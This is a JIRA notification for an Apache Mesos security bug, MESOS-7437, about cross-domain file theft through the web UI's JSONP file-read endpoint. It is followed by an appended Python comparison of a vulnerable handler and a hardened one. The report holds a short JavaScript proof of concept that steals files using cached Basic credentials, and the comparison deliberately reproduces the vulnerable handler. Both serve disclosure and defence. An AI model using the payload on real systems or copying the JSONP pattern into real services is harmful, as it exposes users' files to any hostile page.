[ https://issues.apache.org/jira/browse/MESOS-7437?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Gavin updated MESOS-7437:
-------------------------

Comment: was deleted
(was: www.rtat.net)

> cross domain file-theft in the web-ui
> -------------------------------------
>
> Key: MESOS-7437
> URL: https://issues.apache.org/jira/browse/MESOS-7437
> Project: Mesos
> Issue Type: Bug
> Components: security, webui
> Reporter: Jacob Janco
> Assignee: Jacob Janco
> Priority: Major
>
> {code:javascript}
> x=document.createElement('script')
> x.src='http://$AGENT_URI/files/read?path=$PATH_TO_FILE&offset=0&length=50000&jsonp=console.log&_=1490306716903'
> document.body.appendChild(x)
> {code}
> The above code pasted into the web console on http://example.com/, for
> example, will yield the contents of the requested file. Basic auth is cached
> and resent in browser tabs/windows as long as the user has authenticated
> during the browser session.

--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
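As an added illustration from the defender's side (not code from Mesos or from the reporter), the Python sketch below models the agent's /files/read handler in two forms: a JSONP variant that hands the file to whatever page the victim's browser loads it from, beside a hardened variant that serves only plain JSON and, where the browser sends Sec-Fetch-* headers, refuses cross-site script loads. The file store, paths and header values are constructed sample data.

```python
import json
import re
from typing import Dict, Tuple

# Constructed stand-in for the agent's file store; path and contents are
# hypothetical sample data, not anything taken from Mesos.
FILES = {"/var/log/agent.log": "line 1: secret\nline 2: secret\n"}
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$.]*$")

Response = Tuple[int, Dict[str, str], str]


def read_slice(path: str, params: Dict[str, str]) -> str:
    offset, length = int(params.get("offset", 0)), int(params.get("length", 50000))
    return FILES.get(path, "")[offset:offset + length]


def vulnerable_files_read(params: Dict[str, str], headers: Dict[str, str]) -> Response:
    """JSONP-style handler: the browser attaches the cached Basic credentials to a
    cross-site <script src=...> load, so any page the victim visits gets the file."""
    if "Authorization" not in headers:
        return 401, {"Content-Type": "text/plain"}, "Unauthorized"
    body = json.dumps({"data": read_slice(params.get("path", ""), params)})
    callback = params.get("jsonp")
    if callback and CALLBACK_RE.match(callback):
        # Checking that the callback is a plain identifier blocks script injection
        # but not the leak: the attacker's page chose the name and receives the data.
        return 200, {"Content-Type": "application/javascript"}, f"{callback}({body});"
    return 200, {"Content-Type": "application/json"}, body


def hardened_files_read(params: Dict[str, str], headers: Dict[str, str]) -> Response:
    """Same endpoint without JSONP. A plain JSON body cannot be read through a
    cross-site <script> tag, and Sec-Fetch-* (sent by modern browsers) lets the
    server refuse cross-site or script-context loads outright."""
    if "Authorization" not in headers:
        return 401, {"Content-Type": "text/plain"}, "Unauthorized"
    if headers.get("Sec-Fetch-Site") == "cross-site" or headers.get("Sec-Fetch-Dest") == "script":
        return 403, {"Content-Type": "text/plain"}, "Forbidden"
    # The jsonp parameter is deliberately ignored; nosniff keeps the body from
    # being reinterpreted as script even when a client asks for it.
    body = json.dumps({"data": read_slice(params.get("path", ""), params)})
    return 200, {"Content-Type": "application/json", "X-Content-Type-Options": "nosniff"}, body
```

Older browsers send no Sec-Fetch-* headers, so the 403 branch will not fire for them; the leak is still closed because the response is never wrapped in a callback.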